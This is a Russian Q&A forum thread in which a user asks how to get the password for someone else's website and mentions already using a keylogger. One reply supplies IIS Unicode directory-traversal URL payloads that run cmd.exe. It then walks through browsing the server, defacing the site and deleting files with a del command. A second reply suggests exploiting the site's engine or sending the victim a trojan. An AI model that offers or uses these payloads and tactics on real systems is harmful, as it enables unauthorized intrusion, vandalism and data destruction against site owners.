Прочее компьютерное
Как можно узнать пароль на чужой сайт?
Клавиатурный шпион показывает только логины, набранные на клаве, а мне пароль нужен! ! Помогите, очень нада
Neket Yrkovoy
149
А попалась! Хацкерюга.
Для этого необходимо добавить к урлу ломаемого тобой сайта строчки приведенные чуть ниже. И если после добавления очередной строчки
ты увидишь диск С: / серванта, то знай, ты на верном пути.
/scripts/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/Бњ/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/msadc/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir+c:\ /..\..\winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir\
/cgi-bin/..АЇ..АЇ..АЇ..АЇ..АЇ..АЇ..АЇ..АЇ/
winnt/system32/cmd.exe?/c dir+c:\
И если при добавлении очередной строчки у тебя открылося диск С: / сервера, то знай, ты почти хакер :-)
Находим InetPub и DEFAULT"овую страницу.
Так вот, ты на диске серванта, теперь на данный момент главное для тебя - найти InetPub/wwwroot/А дальше - что админ пошлет :-) Так вот, тебе надо лазить по папкам, но ты незнаешь как, подскажу, видишь диск С: / , допустим есть там папка InetPub, да, есть, и допустим ты сейчас тут : www.сервер. ru/scripts/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\ так вот, мы берем и меняем строку так: www.сервер. ru/scripts/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\InetPub , кликаешь Enter, и видим содержание папки InetPub. Я думаю что все легко и просто . Так, смотрим, видим что есть папка samples, adminscripts, ftproot, wwwroot, опаньки, попалась :-) щас мы туда и пойдем . А если же нету вообще нечего подобного на диске С: / , значит - НЕТУ, иди на другой диск сервера и ищи это все там, делается это так, вот у тебя конец строки : /c+dir+c:\ , меняй его на /c+dir+d:\ - то есть мы теперь переходим на диск D:/ и все по новой - ищи InetPub/wwwroot, так как именно в этой папке и хранится index.htm или default.htm. И все остальных страницы сайта. Но нам все остальные, думаю непонадовятся. Хотя, кто его знает :-) Вдруг ты собрался полностью почистить сервак :-) Так вот, допустим ты нашел, ага, как вижу - нашел :-) Давай займемся собственно говоря, тем, зачем пришли, хаком и дефейсом :-) Погоди еще, стой, я тебе еще не рассказал об одной команде которая тебе может понадобится, это - del . Так вот, что бы ее приминить - меняем конец нашей строки на вот такой /c+del+d:\inetpub\wwwroot\page.htm вот, это командой мы удаляем файл page.htm, и помни - путь и файл можешь писать свой :-)
ты увидишь диск С: / серванта, то знай, ты на верном пути.
/scripts/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/Бњ/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/msadc/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir+c:\ /..\..\winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..АЇ../..АЇ../..АЇ../winnt/system32/cmd.exe?/c+dir\
/cgi-bin/..АЇ..АЇ..АЇ..АЇ..АЇ..АЇ..АЇ..АЇ/
winnt/system32/cmd.exe?/c dir+c:\
И если при добавлении очередной строчки у тебя открылося диск С: / сервера, то знай, ты почти хакер :-)
Находим InetPub и DEFAULT"овую страницу.
Так вот, ты на диске серванта, теперь на данный момент главное для тебя - найти InetPub/wwwroot/А дальше - что админ пошлет :-) Так вот, тебе надо лазить по папкам, но ты незнаешь как, подскажу, видишь диск С: / , допустим есть там папка InetPub, да, есть, и допустим ты сейчас тут : www.сервер. ru/scripts/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\ так вот, мы берем и меняем строку так: www.сервер. ru/scripts/..АЇ../winnt/system32/cmd.exe?/c+dir+c:\InetPub , кликаешь Enter, и видим содержание папки InetPub. Я думаю что все легко и просто . Так, смотрим, видим что есть папка samples, adminscripts, ftproot, wwwroot, опаньки, попалась :-) щас мы туда и пойдем . А если же нету вообще нечего подобного на диске С: / , значит - НЕТУ, иди на другой диск сервера и ищи это все там, делается это так, вот у тебя конец строки : /c+dir+c:\ , меняй его на /c+dir+d:\ - то есть мы теперь переходим на диск D:/ и все по новой - ищи InetPub/wwwroot, так как именно в этой папке и хранится index.htm или default.htm. И все остальных страницы сайта. Но нам все остальные, думаю непонадовятся. Хотя, кто его знает :-) Вдруг ты собрался полностью почистить сервак :-) Так вот, допустим ты нашел, ага, как вижу - нашел :-) Давай займемся собственно говоря, тем, зачем пришли, хаком и дефейсом :-) Погоди еще, стой, я тебе еще не рассказал об одной команде которая тебе может понадобится, это - del . Так вот, что бы ее приминить - меняем конец нашей строки на вот такой /c+del+d:\inetpub\wwwroot\page.htm вот, это командой мы удаляем файл page.htm, и помни - путь и файл можешь писать свой :-)
Максим Чеблаков
94 163
Предыдущего оратора можно не слушать. Это вариант про виндовые сервера, которых на данный момент единицы - все на Linux/FreeBSD(где никакого C: нет и в помине) .
Если есть возможность узнать что за движок у сайта - ищи на него уязвимости. Ну или можно троянчика скормить жертве. :)
Если есть возможность узнать что за движок у сайта - ищи на него уязвимости. Ну или можно троянчика скормить жертве. :)
Анвар Муратов
743
Похожие вопросы
- Кто понимает в компьютерах - объясните) Как узнать пароль администратора?
- Переустановила WINDOWS, все программы, а пароль на аську забыла. Что теперь делать? Как узнать пароль?
- Как узнать пароль учетки админа Win 7 Мне не надо сброса, не надо смены пароля Главное - Узнать
- как узнать пароль учетной записи?
- как узнать пароль своего модема?
- Как узнать пароль другого пользователя
- Как узнать пароль, если знаю только почту и секретное слово? (гугл)
- Если я скачаю программу для подбора паролей и получу ею пароль от чужого сайт, то это будет противозаконно?
- Как узнать пароль пользователя?
- Срочно! Как узнать пароль Администратора?